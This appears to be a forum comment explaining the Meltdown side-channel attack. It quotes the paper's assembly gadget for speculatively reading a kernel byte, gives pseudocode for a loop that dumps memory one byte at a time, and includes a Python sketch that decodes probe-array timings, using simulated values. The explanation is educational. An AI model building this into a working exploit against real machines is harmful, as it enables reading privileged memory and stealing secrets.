Here's the example from the paper.
1: ; rcx = kernel address
2: ; rbx = probe array
3: retry:
4: mov al, byte [rcx] ; Read 1 byte of kernel memory into AL, the least significant byte of RAX
5: shl rax, 0xc ; Multiply the collected value by 4096
6: jz retry ; Retry in case of zero to reduce noise
7: mov rbx, qword [rbx + rax] ; Access memory based on the value read on line 4
8: ; Note: The read on line 4 is illegal, but the CPU speculatively executes lines 5-7 before the fault is raised.
The receiving code then tries to access each of the 256 page-sized slots in the probe array and measures the time each access takes. For one of them the access time will be much lower, since that memory is already cached, and the index of that slot is the value that was read. So if you read the value 84 on line 4, then accessing offset 344064 (0x54000, i.e. 84 * 4096) in your probe array will be faster than the rest and you can deduce that the value read was 84.
So in pseudocode the attack is:
start = 0xFFEE // No idea if this is a reasonable start location
result = []
offset = 0
page_size = 4096
probe_array = malloc(256 * page_size)
loop {
flush_caches(probe_array)
read_and_prepare_cache(start + offset, probe_array) // The above assembly; it leaks 1 byte per call, so advance 1 byte at a time
result.push(determine_read_value(probe_array))
offset += 1
}
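To make the decoding step concrete, here is a minimal Python sketch of what determine_read_value might do. It does not perform the attack or measure real cache timings; it assumes you already have one access time per probe slot, and the timing numbers below are made up for illustration. probe_offset is a hypothetical helper name, not something from the paper.

```python
PAGE_SIZE = 4096  # stride between probe slots, matching the shl by 0xc


def probe_offset(value: int) -> int:
    """Byte offset into the probe array that line 7 touches for a leaked byte."""
    return value * PAGE_SIZE


def determine_read_value(access_times):
    """Return the index of the fastest of the 256 probe accesses.

    access_times[i] is assumed to be the measured time to read the slot at
    offset i * PAGE_SIZE. The cached slot should be much faster than the rest.
    """
    if len(access_times) != 256:
        raise ValueError("expected one timing per possible byte value")
    return min(range(256), key=lambda i: access_times[i])


# Simulated timings (illustrative only): every slot is slow except slot 84.
timings = [300] * 256
timings[84] = 40

leaked = determine_read_value(timings)
print(leaked, hex(probe_offset(leaked)))
```

A real receiver would also need a threshold to tell a cache hit from noise, which this sketch leaves out.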
There's an extra detail here about recovering quickly from the illegal memory access that I've skipped. To answer the parent's question: I believe this only pulls a single cache line (64 bytes) of the probe array into the cache per leaked byte, since it only accesses a single value.
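A quick way to check the cache line reasoning is to work out which line each possible byte value would touch. This is only arithmetic, under the assumptions that cache lines are 64 bytes (typical on x86-64) and that the probe array starts on a cache line boundary; touched_line is a hypothetical helper name.

```python
CACHE_LINE = 64   # bytes; assumed, typical for x86-64
PAGE_SIZE = 4096  # stride used by the assembly (shl rax, 0xc)
LOAD_SIZE = 8     # the qword load on line 7 reads 8 bytes


def touched_line(value: int) -> int:
    """Index of the cache line, relative to the probe array start, hit for a byte value."""
    return (value * PAGE_SIZE) // CACHE_LINE


# The 8-byte load starts on a line boundary, so it stays inside one line.
first = touched_line(84)
last = (84 * PAGE_SIZE + LOAD_SIZE - 1) // CACHE_LINE
print(first, last)

# Every nonzero byte value maps to a different line (and a different page).
lines = {touched_line(v) for v in range(1, 256)}
print(len(lines))
```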
This is my understanding anyway, happy to be corrected.